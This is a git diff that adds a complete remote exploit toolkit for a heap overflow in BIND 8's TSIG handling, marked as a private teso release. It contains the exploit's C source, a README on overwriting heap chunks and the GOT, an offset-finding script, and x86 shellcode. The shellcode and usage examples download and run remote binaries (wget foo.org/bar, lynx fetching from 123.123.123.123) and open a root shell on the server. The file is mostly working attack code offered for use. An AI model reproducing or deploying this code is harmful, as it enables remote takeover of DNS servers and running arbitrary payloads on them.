+        owrite_len = mk_overwrite_pkt (owrite);
+        if (owrite_len > 65535) {
+                fprintf (stderr, "fuck..\n");
+                return (-1);
+        }
+        mallox_len = mk_malloc_pkt (mallox);
+        s1 = get_connection (addr);
+        s2 = get_connection (addr);
+        s3 = get_connection (addr);
+        if (s1 < 0 || s2 < 0 || s3 < 0) {
+                perror ("get_connection");
+                goto fail;
+        }
+        /* make named allocate the packet data */
+        *(u_int16_t *)len = htons (0x60);
+        if (Xsend (s1, len, 2, 0) < 0) {
+                perror ("send");
+                goto fail;
+        }
+        *(u_int16_t *)len = htons (owrite_len);
+        if (Xsend (s2, len, 2, 0) < 0) {
+                perror ("send");
+                goto fail;
+        }
+        /* server still expects more.. */
+        *(u_int16_t *)len = htons (mallox_len + 1);
+        if (Xsend (s3, len, 2, 0) < 2) {
+                perror ("send");
+                goto fail;
+        }
+        printf ("sending main part of malloc packet...\n");
+        if (Xsend (s3, mallox, mallox_len, 0) < (mallox_len)) {
+                perror ("malloc send");
+                goto fail;
+        }
+        sleepvis (5);
+        printf ("sending overwrite packet...\n");
+        /* overwrite the 3rd packet with the 2nd */
+        if (Xsend (s2, owrite, owrite_len, 0) < owrite_len) {
+                perror ("owrite_send");
+                goto fail;
+        }
+        while (blue < 65300) {
+                int     n;
+                n = recv (s2, owrite, sizeof(owrite), 0);
+                if (n <= 0)
+                        break;
+                blue += n;
+        }
+        close (s2);
+        s4 = get_warez_connection (addr);
+        if (s4 < 0) {
+                perror ("get_warez_connection");
+                return (-1);
+        }
+        fprintf (stderr, "sent overwrite packet...sleeping for 2 seconds\n");
+        sleepvis (2);
+        /* experimental reliability patch */
+        fprintf (stderr, "sending dummy packets with shellcode to populate the heap\n");
+        send_populators (addr, 20);
+        sleepvis (5);
+        fprintf (stderr, "freeing packet\n");
+        /* free the 3rd packet */
+        if (Xsend (s3, "a",1,0) < 1) {
+                perror ("malloc 2 send");
+                goto fail;
+        }
+        close(s3);
+        sleepvis (2);
+        fprintf (stderr, "doing close\n");
+        send (s1, mallox, 0x60, 0);
+        close (s1);
+        sleepvis (2);
+        fprintf (stderr, "doing fork-away and bogus connect to trigger close...\n");
+        if (fork () == 0) {
+                send_bogus (addr);
+                exit (EXIT_SUCCESS);
+        }
+        if (mass == 1) {
+                sleepvis (5);
+                fprintf (stderr, "egg placed, may the force be with you.\n");
+                exit (EXIT_SUCCESS);
+        }
+        fprintf (stderr, "trying shell....\n");
+        fprintf (stderr, "advice: be patient, if it does not seem react here, wait. BIND may be in\n");
+        fprintf (stderr, "        an unstable state, but we will send a bogus packet in 10 seconds.\n");
+        fprintf (stderr, "        if it does react after some minutes, but behaves blocky,\n");
+        fprintf (stderr, "        something went wrong, but you can still type blind and wait a\n");
+        fprintf (stderr, "        few minutes for it to react, sorry.\n");
+        fprintf (stderr, "-------------------------------------------------------------------------\n");
+#ifndef TRUST_THE_MAGIC
+        write (s4, xp_initstr, strlen (xp_initstr));
+#endif
+        runshell (s4);
+        err++;
+fail:
+        err--;
+        close (s1);
+        close (s2);
+        close (s3);
+        return (err);
+}
+int
+send_exploit (char *hname)
+{
+        struct addrinfo *addr, hints;
+        int err = 0; 
+        memset (&hints, 0, sizeof(hints));
+        hints.ai_flags = AI_CANONNAME;
+        hints.ai_family = PF_UNSPEC;
+        hints.ai_socktype = SOCK_STREAM;
+        err = getaddrinfo (hname, "domain", &hints, &addr);
+        if (err) {
+                fprintf (stderr, "getaddrinfo: %s\n", gai_strerror (err));
+                return (-1);
+        }
+        if (check_version) {
+                unsigned char   verbuf[64];
+                fprintf (stderr, "probing for BIND version %s\n", vec->verstr);
+                memset (verbuf, '\0', sizeof (verbuf));
+                bind_version (addr, verbuf, sizeof (verbuf));
+                verbuf[sizeof (verbuf) - 1] = '\0';
+                if (strcmp (verbuf, vec->verstr) != 0) {
+                        fprintf (stderr, "remote uses BIND version \"%s\",\n"
+                                "while the vector is for BIND version \"%s\".\n"
+                                "use -n option to override, but know what you do\n",
+                                verbuf, vec->verstr);
+                        exit (EXIT_FAILURE);
+                }
+                fprintf (stderr, "remote uses correct version: \"%s\"\n", verbuf);
+        }
+        err = send_expl (addr);
+        freeaddrinfo (addr);
+        return (err);
+}
+void
+usage (char *prg)
+{
+        fprintf (stderr, "usage: %s [-h ip] [-t target] [mass commands]\n\n", prg);
+        fprintf (stderr, "-c           mass mode. experts only\n");
+        fprintf (stderr, "-n           do NOT check for the correct BIND version\n");
+        fprintf (stderr, "-h ip        set target ip (default: 127.0.0.1)\n");
+        fprintf (stderr, "-t target    set target, zero gives a list\n\n");
+        fprintf (stderr, "example: %s -h 127.0.0.1 -t 4 -c -- /bin/sh -c \\\n"
+                "\t\"cd /tmp;wget foo.org/bar;chmod +x bar;./bar\"\n\n", prg);
+        exit (EXIT_FAILURE);
+}
+int
+main (int argc, char **argv)
+{
+        char c;
+        char * dest = "127.0.0.1";
+        int target = 0;
+        unsigned char   codebuf[256];
+        if (argc == 1)
+                usage (argv[0]);
+        while ((c = getopt (argc, argv, "cnh:t:")) != EOF) {
+                switch (c) {
+                case 'c':
+                        mass = 1;
+                        break;
+                case 'n':
+                        check_version = 0;
+                        break;
+                case 'h':
+                        dest = optarg;
+                        break;
+                case 't':
+                        if (atoi (optarg) == 0) {
+                                target_t *ptr;
+                                int ctr;
+                                printf ("\tno   system                          BIND version\n");
+                                printf ("\t---  ------------------------------  ---------------\n");
+                                for (ctr = 1, ptr = targets; ptr->name; ++ptr, ++ctr)
+                                        fprintf (stderr, "\t%2d:  %-30s  %-15s\n%s", ctr,
+                                                ptr->name, ptr->verstr,
+                                                ptr->nl == 1 ? "\n" : "");
+                                exit (EXIT_FAILURE);
+                        }
+                        target = atoi (optarg);
+                        break;
+                default:
+                        usage (argv[0]);
+                        break;
+                }
+        }
+        /* one remaining argument (script file name)
+         */
+        if (mass == 1 && (argc - optind) == 0)
+                usage (argv[0]);
+        if (mass == 1) {
+                int     len;
+                len = sc_build_x86_lnx (codebuf, sizeof (codebuf),
+                        x86_lnx_execve, &argv[optind]);
+                fprintf (stderr, "created %d byte execve shellcode\n", len);
+                code = codebuf;
+                code_len = len;
+        }
+        target -= 1;
+        if (target >= target_cnt)
+                target = 0;
+        vec = &targets[target];
+        fprintf (stderr, "using: %s\n", vec->name);
+        fprintf (stderr, "against: %s\n", dest);
+        fprintf (stderr, "\n");
+        srand (time (NULL));
+        send_exploit (dest);
+        return (EXIT_SUCCESS);
+}
+void
+bind_version (struct addrinfo *addr, unsigned char *verbuf,
+        unsigned long int verlen)
+{
+        int                     s1;
+        unsigned char           pkt[] =
+                "\x00\x06\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
+                "\x07\x76\x65\x72\x73\x69\x6f\x6e\x04\x62\x69\x6e"
+                "\x64\x00\x00\x10\x00\x03";
+        unsigned char *         ver;
+        unsigned char           resp[256];
+        unsigned char           len[2];
+        s1 = get_connection (addr);
+        if (s1 < 0) {
+                perror ("bind_version:connect");
+                exit (EXIT_FAILURE);
+        }
+        *(u_int16_t *)len = htons (30);
+        if (Xsend (s1, len, 2, 0) < 0) {
+                perror ("bind_version:send-len");
+                exit (EXIT_FAILURE);
+        }
+        if (Xsend (s1, pkt, 30, 0) < 30) {
+                perror ("bind_version:send-data");
+                exit (EXIT_FAILURE);
+        }
+        memset (resp, '\0', sizeof (resp));
+        if (Xread (s1, resp, sizeof (resp) - 1) < 0) {
+                perror ("bind_version:read-data");
+                exit (EXIT_FAILURE);
+        }
+        ver = resp + sizeof (resp) - 1;
+        while (ver > resp && *ver == '\0')
+                --ver;
+        while (ver > resp && isprint (*ver) && *ver >= 0x20)
+                --ver;
+        if (*ver < 0x20)
+                ++ver;
+        strncpy (verbuf, ver, verlen);
+        close (s1);
+}
+static int
+sc_build_x86_lnx (unsigned char *target, size_t target_len, unsigned char *shellcode,
+        char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
diff --git a/other/tsig/Makefile b/other/tsig/Makefile
new file mode 100644
index 0000000..6010ccd
--- /dev/null
+++ b/other/tsig/Makefile
@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -Wall -g -ggdb
+OBJS = tcp.o dnslib.o
+all: tsig
+tsig: $(OBJS)
+        $(CC) -o $@ $(OBJS)
+clean:
+        rm -rf $(OBJS) tsig
diff --git a/other/tsig/README b/other/tsig/README
new file mode 100644
index 0000000..da4ce79
--- /dev/null
+++ b/other/tsig/README
@@ -0,0 +1,83 @@
+VULNERABILITY INFORMATION
+The overflow occurs when BIND overwrites your TSIG record with its own, after
+the end of the question section without proper bounds checking.
+The overwritten data appears to be:
+00 00 fa 00 ff 00 00 00 00 ll ll 00 00 00 tt tt tt tt 01 2c 00 00
+id id 00 11 00 00
+where:
+  id is the original dns id
+  ll is the rdlength
+  tt is the time it was signed
+TCP EXPLOITATION INFORMATION FROM SCUT
+With TCP, packet space is allocated on the heap, always in 65536 sized
+chunks. To exploit it one must obtain two packet chunks directly bordering.
+To make named allocate space you must send at least the 2 initial bytes which
+indicate the length of the packet. Creating just 2 allocated packets doesn't
+work because of the many little things which are allocated inbetween
+connections. I still don't have a completely reliable way of getting two
+consecutive packets...
+I overwrite the length with 'id id 00 11' where id is the DNS ID in the header
+of the packet you sent. This is set to 0 of course. The advantage with this
+is PREV_INUSE flag is set, so when its freed it doesnt try to consolidate the
+previous block so the prev_size you just overwrote doesnt matter. The actual
+length of the chunk is now 0x10, so there is 8 junk bytes, and then another
+chunk which you can fully control, woohoo ;) malloc should try and consolidate
+the two 'chunks', which should cause an overwrite.....
+The layout of the 3rd packet after the overwrite will be:
+<prev_size = 0><size = 0x11><junk> ...
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+   Overwritten -^
+  mark previous as in use-.
+                          v
+<prev_size = 0><size = 0x11><retloc - 12><buffer + 12 + 1>...
+  mark previous as not in use-.
+                              v
+<prev_size = 0x10><size = 0x10><junk 8 bytes>
+  mark previous as in use-.
+                          v
+<prev_size = 0><size = 0x11><junk 8 bytes>
+Important - after you send the complete overwrite packet remember to read
+the response frmo the server, it will be about 65545 bytes, otherwise the
+server hangs trying to send you data and the exploit doesn't work.
+OFFSETS
+Getting offsets for the udp simple method is relatively easy, it just takes
+some single stepping skill, and knowledge of basic stack layout. For the
+complex udp method its very difficult and time-consuming, and i don't
+really have a systematic way of doing it.
+TCP is much easier. Just do:
+ltrace -e malloc -p `pidof named`
+as root and watch the output as you create three simultaneous connections
+and send two bytes on each. BIND should allocate memory for each connection
+and the one you want is the second one. Add 13, and this is 'buf_addr' in
+target_t. Then just do:
+$ gdb /usr/sbin/named
+(gdb) disass close
+Dump of assembler code for function close:
+0x8049fa8 <close>:      jmp    *0x80f7230
+0x8049fae <close+6>:    push   $0xa0
+0x8049fb3 <close+11>:   jmp    0x8049e58
+End of assembler dump.
+(gdb)
+The '0x80f7230' is the one you want for 'retloc' in target_t. And thats it!
+Don't you just love the GOT ? :)
+or just use find-offset.sh.....
diff --git a/other/tsig/TODO b/other/tsig/TODO
new file mode 100644
index 0000000..7ecb04c
--- /dev/null
+++ b/other/tsig/TODO
@@ -0,0 +1,2 @@
+Add many connections to create huge padded buffer
+Collect more offsets
diff --git a/other/tsig/dnslib.c b/other/tsig/dnslib.c
new file mode 100644
index 0000000..25bb41c
--- /dev/null
+++ b/other/tsig/dnslib.c
@@ -0,0 +1,270 @@
+#include <stdio.h>
+#include "dnslib.h"
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+int
+dns_mklongdn (u_char *cp, int length)
+{
+        int     orig_len = length;
+        if (length == 0)
+                return (0);
+again:
+        if (length <= 64) {             
+                if (length == 1) {
+                        fprintf (stderr, "fuck...\n");
+                        exit (-1);
+                }
+                *cp++ = length - 1;
+                memset (cp, 'A', length - 1);
+                cp += length - 1;
+                return (orig_len);
+        } else {
+                if (length == 65) {
+                        /* we don't want just 1 byte left over */
+                        *cp++ = 0x3e;
+                        memset (cp, 'A', 0x3f);
+                        cp += 0x3f;
+                        length -= 0x3f;
+                } else {
+                        *cp++ = 0x3f;
+                        memset (cp, 'A', 0x3f);
+                        cp += 0x3f;
+                        length -= 0x40;
+                }
+                goto again;
+        }
+        return (orig_len);
+}
+static void
+hex_dump (unsigned char *buf, int len)
+{
+        if (len > 0x50)
+                len = 0x50;
+        while (len--) {
+                fprintf (stderr, "%01x ", *buf++);
+        }
+}
+void
+dns_debug (unsigned char *buf)
+{
+        HEADER *hdr;
+        unsigned char *orig = buf;
+        unsigned char tmp[1024];
+        int     i;
+        hdr = (HEADER *)buf;
+        fprintf (stderr,
+                "qr = %d\n"
+                "id = %d\n"
+                "opcode = %d\n"
+                "aa = %d\n"
+                "tc = %d\n"
+                "rd = %d\n"
+                "ra = %d\n"
+                "rcode = %d\n"
+                "qdcount = %d\n"
+                "ancount = %d\n"
+                "nscount = %d\n"
+                "arcount = %d\n",
+                hdr->qr, ntohs(hdr->id), hdr->opcode, hdr->aa, hdr->tc,
+                hdr->rd, hdr->ra, hdr->rcode,
+                ntohs (hdr->qdcount), ntohs(hdr->ancount),
+                ntohs (hdr->nscount), ntohs (hdr->arcount));
+        buf += NS_HFIXEDSZ;
+        i = ntohs (hdr->qdcount);
+        while (i--) {
+                u_int16_t type, klass;
+                buf += dns_dn_expand (buf, tmp, orig);
+                NS_GET16 (type, buf);
+                NS_GET16 (klass, buf);
+                fprintf (stderr, "\n%s %d %d\n", tmp, type, klass); 
+        }
+        i = ntohs (hdr->ancount) + ntohs (hdr->nscount) + ntohs (hdr->arcount);
+        while (i--) {
+                u_int16_t type, klass, rdlength;
+                u_int32_t ttl;
+                buf += dns_dn_expand (buf, tmp, orig);
+                fprintf (stderr, "%s ", tmp);
+                NS_GET16 (type, buf);
+                NS_GET16 (klass, buf);
+                NS_GET32 (ttl, buf);
+                NS_GET16 (rdlength, buf);
+                fprintf (stderr, "%d %d ", type, klass);
+                switch (type) {
+                case ns_t_a:
+                        fprintf (stderr, "%s\n", inet_ntoa (*(struct in_addr *)buf));
+                        break;
+                case ns_t_ptr:
+                case ns_t_cname:
+                case ns_t_ns:
+                        dns_dn_expand (buf, tmp, orig);
+                        fprintf (stderr, "%s\n", tmp);
+                        break;
+                default:
+                        hex_dump (buf, rdlength);
+                }
+                buf += rdlength;
+        }
+}
+/* make a full dns query including header. Returns length of packet.
+ */
+int
+dns_mkquery (char *name, u_char *buffer, u_int16_t id, ns_type type, ns_class klass)
+{
+        HEADER *head;
+        head = (HEADER *)buffer;
+        bzero (head, NS_HFIXEDSZ);
+        head->id = htons (id);
+        head->qr = 0;
+        head->opcode = 0;
+        head->aa = 0;
+        head->tc = 0;
+        head->rd = 1;
+        head->ra = 0;
+        head->rcode = 0;
+        head->qdcount = htons (1);
+        head->ancount = 0;
+        head->nscount = 0;
+        head->arcount = 0;
+        return (dns_mkqbody (name, buffer + NS_HFIXEDSZ, type, klass) + NS_HFIXEDSZ);
+}
+/* convert a \0-terminated string to a DNS domain name.
+ * www.yahoo.com(.) => \003www\005yahoo\003\com\000
+ */
+int
+dns_mkdn (char *in, u_char *out)
+{
+        char *start = in, c = 0;
+        int n = strlen (in);
+        in += n - 1;
+        out += n + 1;
+        *out-- = 0;
+        n = 0;
+        while (in >= start) {
+                c = *in--;
+                if (c == '.') {
+                        *out-- = n;
+                        n = 0;
+                } else {
+                        *out-- = c;
+                        n++;
+                }
+        }
+        if (n)
+                *out-- = n;
+        return (strlen (out + 1) + 1);
+}
+/* simple function for making a, ptr and ns resource records
+ * doesn't support more complicated stuph.
+ */
+int 
+dns_mkrr (char *name, u_char *buf, ns_type type, ns_class klass,
+        char *rdata, u_int32_t ttl)
+{
+        int             n;
+        rrec_body       *rec;
+        u_char          *ptr = buf;
+        /* name the resource record pertains too */
+        ptr += dns_mkdn (name, ptr);
+        rec = (rrec_body *)ptr;
+        rec->type = htons (type);
+        rec->klass = htons (klass);
+        rec->ttl = htonl (ttl);
+        rec->rdlength = 0;
+        ptr += 10;
+        switch (type) {
+        case ns_t_a:
+                *(u_int32_t *)ptr = inet_addr (rdata);
+                rec->rdlength = htons (4);
+                ptr += 4;
+                break;
+        case ns_t_ptr:
+        case ns_t_ns:
+                n = dns_mkdn (rdata, ptr);
+                ptr += n;
+                rec->rdlength = htons (n);
+                break;
+        default:
+                /**/
+        }
+        return (ptr - buf);
+}
+/* make just the body of a DNS query.
+ */
+int
+dns_mkqbody (char *name, u_char *buffer, ns_type type, ns_class klass)
+{
+        int len;
+        len = dns_mkdn (name, buffer);
+        buffer += len;
+        NS_PUT16 (type, buffer);
+        NS_PUT16 (klass, buffer);
+        return (len + 4);
+}
+/* uncompress compressed dns names. ugh.
+ * works for normal formatted dns names too..
+ * returns the length of the first part of the compressed name (i.e.
+ * before redirection).
+ */
+int
+dns_dn_expand (u_char *in, char *out, u_char *msg)
+{
+        u_char *start = in, *end = NULL;
+        u_char len;
+        u_int16_t off;
+        while ((len = *in++)) {
+                if (len & NS_CMPRSFLGS) {
+                        if (end == NULL)
+                                end = in + 1;
+                        off = (len & ~NS_CMPRSFLGS);
+                        off |= *in++ << 8;
+                        off = ntohs (off);
+                        in = msg + off;
+                        continue;
+                }
+                memcpy (out, in, len);
+                out += len;
+                in  += len;
+                *out++ = '.';
+        }
+        if (end == NULL)
+                end = in;
+        *out++ = 0;
+        return (end - start);
+}
diff --git a/other/tsig/dnslib.h b/other/tsig/dnslib.h
new file mode 100644
index 0000000..ccf4bfb
--- /dev/null
+++ b/other/tsig/dnslib.h
@@ -0,0 +1,58 @@
+/* dns helper functions by smiler / teso
+ * requires bind 8.x headers now
+ */
+#ifndef DNSLIB_H
+#define DNSLIB_H
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <arpa/nameser.h>
+/* little endian macros */
+#define NS_LPUT16(s, blah) { \
+        u_char *p = blah; \
+        *(u_int16_t *)p = s; \
+        blah += 2; \
+} 
+#define NS_LPUT32(s, blah) { \
+        u_char *p = blah; \
+        *(u_int32_t *)p = s; \
+        blah += 4; \
+}
+/* make a fully blown query packet */
+int dns_mkquery (char *name, u_char *buffer, u_int16_t id, ns_type type, ns_class klass);
+/* make a query record */
+int dns_mkqbody (char *name, u_char *buffer, ns_type type, ns_class klass);
+/* convert to dns names, i.e. www.yahoo.com ==> \003www\005yahoo\003com\000 */
+int dns_mkdn (char *in, u_char *out);
+/* uncompress (unchecked) a dns name */
+int dns_dn_expand (u_char *in, char *out, u_char *msg);
+/* make a long dns name fragment (without terminating \000)
+ * provided length > 1
+ */
+int dns_mklongdn (u_char *cp, int length);
+/* print debug information to stderr
+ */
+void dns_debug (unsigned char *buf);
+typedef struct {
+        u_int16_t type;
+        u_int16_t klass;
+        u_int32_t ttl;
+        u_int16_t rdlength;
+} rrec_body;
+/* create a resource record */
+int     dns_mkrr (char *name, u_char *buf, ns_type type, ns_class klass,
+                char *rdata, u_int32_t ttl);
+#endif /* DNSLIB_H */
diff --git a/other/tsig/dnslib.o b/other/tsig/dnslib.o
new file mode 100644
index 0000000..b3a63db
--- /dev/null
+++ b/other/tsig/dnslib.o
Binary files differ
diff --git a/other/tsig/find-offset.sh b/other/tsig/find-offset.sh
new file mode 100644
index 0000000..2338253
--- /dev/null
+++ b/other/tsig/find-offset.sh
@@ -0,0 +1,87 @@
+#!/bin/sh
+check_util ()
+{
+        for util in $*; do
+                echo -n "checking for $util: "
+                if ! which $util; then
+                        echo "not found, aborting"
+                        exit
+                fi
+        done
+}
+echo "7350 tsig exploit tcp offset finder"
+if [ $# != 2 ]; then
+        echo "usage: $0 /path/to/named/binary pid-of-running-named"
+        echo
+        exit
+fi;
+check_util ltrace objdump gcc
+cat > lala.c << EOF
+#include <stdio.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+int
+get_connect (void)
+{
+        int     sock;
+        struct sockaddr_in sin;
+        memset (&sin, 0, sizeof(sin));
+        sock = socket(AF_INET, SOCK_STREAM, 0);
+        if (sock < 0) {
+                perror ("socket");
+                exit (-1);
+        }
+        sin.sin_addr.s_addr = inet_addr("127.0.0.1");
+        sin.sin_port = htons (53);
+        sin.sin_family = AF_INET;
+        if (connect (sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+                perror ("connect");
+                exit (-1);
+        }
+        send (sock, "aa", 2, 0);
+}
+int
+main (int argc, char **argv)
+{
+        get_connect();
+        get_connect();
+        get_connect();
+        return(0);
+}
+EOF
+gcc lala.c -o lala
+ltrace -e malloc -p $2 -o ltrace-log &
+ltrace_pid="$!"
+./lala
+kill -INT ${ltrace_pid}
+cat ltrace-log | head -2 | tail -1 > tmp 
+cat tmp | cut -d '=' -f2 | cut -c4- > ltrace-log
+HEH=`cat ltrace-log| tr 'a-z' 'A-Z'`
+cat > dc << EOF
+16
+o
+16
+i
+EOF
+echo ${HEH} >> dc
+echo "D" >> dc
+echo "+" >> dc
+echo "p" >> dc
+ret_addr=`dc ./dc`
+echo $HEH
+echo "set ret_addr to 0x$ret_addr"
+rm -f ltrace-log tmp lala.c lala dc
+HEH=`objdump --dynamic-reloc $1 | grep " close$" | cut -f1 -d ' '`
+HEH="0x$HEH"
+echo "set retloc to $HEH"
diff --git a/other/tsig/obsolete/find-offset.sh b/other/tsig/obsolete/find-offset.sh
new file mode 100644
index 0000000..2338253
--- /dev/null
+++ b/other/tsig/obsolete/find-offset.sh
@@ -0,0 +1,87 @@
+#!/bin/sh
+check_util ()
+{
+        for util in $*; do
+                echo -n "checking for $util: "
+                if ! which $util; then
+                        echo "not found, aborting"
+                        exit
+                fi
+        done
+}
+echo "7350 tsig exploit tcp offset finder"
+if [ $# != 2 ]; then
+        echo "usage: $0 /path/to/named/binary pid-of-running-named"
+        echo
+        exit
+fi;
+check_util ltrace objdump gcc
+cat > lala.c << EOF
+#include <stdio.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+int
+get_connect (void)
+{
+        int     sock;
+        struct sockaddr_in sin;
+        memset (&sin, 0, sizeof(sin));
+        sock = socket(AF_INET, SOCK_STREAM, 0);
+        if (sock < 0) {
+                perror ("socket");
+                exit (-1);
+        }
+        sin.sin_addr.s_addr = inet_addr("127.0.0.1");
+        sin.sin_port = htons (53);
+        sin.sin_family = AF_INET;
+        if (connect (sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
+                perror ("connect");
+                exit (-1);
+        }
+        send (sock, "aa", 2, 0);
+}
+int
+main (int argc, char **argv)
+{
+        get_connect();
+        get_connect();
+        get_connect();
+        return(0);
+}
+EOF
+gcc lala.c -o lala
+ltrace -e malloc -p $2 -o ltrace-log &
+ltrace_pid="$!"
+./lala
+kill -INT ${ltrace_pid}
+cat ltrace-log | head -2 | tail -1 > tmp 
+cat tmp | cut -d '=' -f2 | cut -c4- > ltrace-log
+HEH=`cat ltrace-log| tr 'a-z' 'A-Z'`
+cat > dc << EOF
+16
+o
+16
+i
+EOF
+echo ${HEH} >> dc
+echo "D" >> dc
+echo "+" >> dc
+echo "p" >> dc
+ret_addr=`dc ./dc`
+echo $HEH
+echo "set ret_addr to 0x$ret_addr"
+rm -f ltrace-log tmp lala.c lala dc
+HEH=`objdump --dynamic-reloc $1 | grep " close$" | cut -f1 -d ' '`
+HEH="0x$HEH"
+echo "set retloc to $HEH"
diff --git a/other/tsig/shellcode/execve-shellcode.s b/other/tsig/shellcode/execve-shellcode.s
new file mode 100644
index 0000000..25015cf
--- /dev/null
+++ b/other/tsig/shellcode/execve-shellcode.s
@@ -0,0 +1,49 @@
+/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */
+.data
+.globl  cbegin
+.globl  cend
+cbegin:
+        jmp     jahead
+docall:
+        pop     %edi
+        xorl    %eax, %eax              /* read number of arguments */
+        push    %eax
+        movb    (%edi), %al
+        inc     %edi
+decl1:  push    %edi
+decl2:  scasb                           /* search delim bytes */
+        jnz     decl2
+        movb    %ah, -1(%edi)
+        dec     %eax
+        jnz     decl1
+        pop     %ebx                    /* pathname */
+        push    %ebx
+        push    %eax
+        pop     %edx                    /* esp -= 4, edx = &envp[] = NULL */
+        movl    %esp, %ecx              /* ecx = &argv[] */
+        movb    $11, %al
+        int     $0x80
+jahead: call    docall
+/* reverse order arguments */
+.byte   0x03    /* number of arguments */
+.ascii  "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a"
+.byte   0x03
+.ascii  "-c"
+.byte   0x02
+.ascii  "/bin/sh"
+.byte   0x01
+cend:
diff --git a/other/tsig/shellcode/peername.s b/other/tsig/shellcode/peername.s
new file mode 100644
index 0000000..61cab0a
--- /dev/null
+++ b/other/tsig/shellcode/peername.s
@@ -0,0 +1,79 @@
+.globl  cbegin
+.globl  cend
+cbegin:
+        xor    %ebx,%ebx
+        mov    $0x7,%bl
+        mov    %esp,%edx
+        jmp    label1
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+        stos   %al,%es:(%edi)
+label1:
+        push   $0x10
+        mov    %esp,%ecx
+        push   %ecx
+        push   %edx
+        push   $0xfe
+        mov    %esp,%ecx
+label2:
+        xor    %eax,%eax
+        mov    $0x66,%al
+        int    $0x80
+        test   $0xff,%al
+        jne    label3
+        cmpw   $0x5234,0x12(%esp,1)
+        je     label4
+label3:
+        pop    %edx
+        test   $0xff,%dl
+        je     label7
+        dec    %dl
+        push   %edx
+        jmp    label2
+.ascii "\x38"
+label4:
+        pop    %ebx
+        xor    %ecx,%ecx
+        mov    $0x3,%cl
+label5:
+        dec    %cl
+        xor    %eax,%eax
+        mov    $0x3f,%al
+        int    $0x80
+        jcxz   label6
+        jmp    label5
+label6:
+        push   $0x4
+        push   $0x0
+        push   $18
+        push   $1
+        push   %ebx
+        movl   $102, %eax
+        movl   $14, %ebx
+        movl   %esp, %ecx
+        int $0x80
+        push   $0x0
+        push   $0x0
+        push   $0x68732f
+        push   $0x6e69622f
+        lea    0x8(%esp,1),%ecx
+        lea    0xc(%esp,1),%edx
+        mov    %esp,(%ecx)
+        mov    %esp,%ebx
+        xor    %eax,%eax
+        mov    $0xb,%al
+        int    $0x80
+label7:
+        xor    %eax,%eax
+        inc    %al
+        int    $0x80
+cend:
diff --git a/other/tsig/shellcode/shellcode.c b/other/tsig/shellcode/shellcode.c
new file mode 100644
index 0000000..0239f12
--- /dev/null
+++ b/other/tsig/shellcode/shellcode.c
@@ -0,0 +1,48 @@
+/* shellcode extraction utility,
+ * by typo / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+extern void     cbegin ();
+extern void     cend ();
+int
+main (int argc, char *argv[])
+{
+        int             i;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ex_buf[1024];
+        printf ("/* %d byte shellcode */\n", cend - cbegin);
+        printf ("\"");
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                printf ("\\x%02x", *buf & 0xff);
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"\n\"");
+                }
+        }
+        printf ("\";\n");
+        printf("\n");
+        if (argc > 1) {
+                printf ("%02x\n", ((unsigned char *) cbegin)[0]);
+                printf ("%02x\n", ex_buf[0]);
+                memcpy (ex_buf, cbegin, cend - cbegin);
+                printf ("%02x\n", ex_buf[0]);
+                ((void (*)()) &ex_buf)();
+        }
+        exit (EXIT_SUCCESS);
+}
diff --git a/other/tsig/tcp.c b/other/tsig/tcp.c
new file mode 100644
index 0000000..fa942f1
--- /dev/null
+++ b/other/tsig/tcp.c
@@ -0,0 +1,857 @@
+/* coded by smiler / teso
+ *
+ * teso private release - do not distribute
+ *
+ * based on scut's method
+ *
+ * 0.2 added palmers slack 7.1 offsets
+ * 0.3 added scut's huge collection of offsets :)
+ * 0.4 added populator reliability -sc. :)
+ *
+ * feedback welcome, im sure there is a better way to do it than this.
+ */
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <ctype.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#include <fcntl.h>
+#include <unistd.h>
+#if !defined(__FreeBSD__)
+#  include <getopt.h>
+#endif
+#include "dnslib.h"
+unsigned char   xp_initstr[] = "unset HISTFILE;uname -a;id;\n";
+unsigned char trap_code[] = "\x06\x31\xc0\xfe\xc0\xcd\x80";
+/* peername code that checks the source port connecting
+ * also setsockopts the SO_RCVLOWAT value in case BIND is
+ * waiting for such, which can happen
+ */
+unsigned char peername_code[]=
+        "\x31\xdb\xb3\x07\x89\xe2\xeb\x09\xaa\xaa\xaa\xaa"
+        "\xaa\xaa\xaa\xaa\xaa\x6a\x10\x89\xe1\x51\x52\x68"
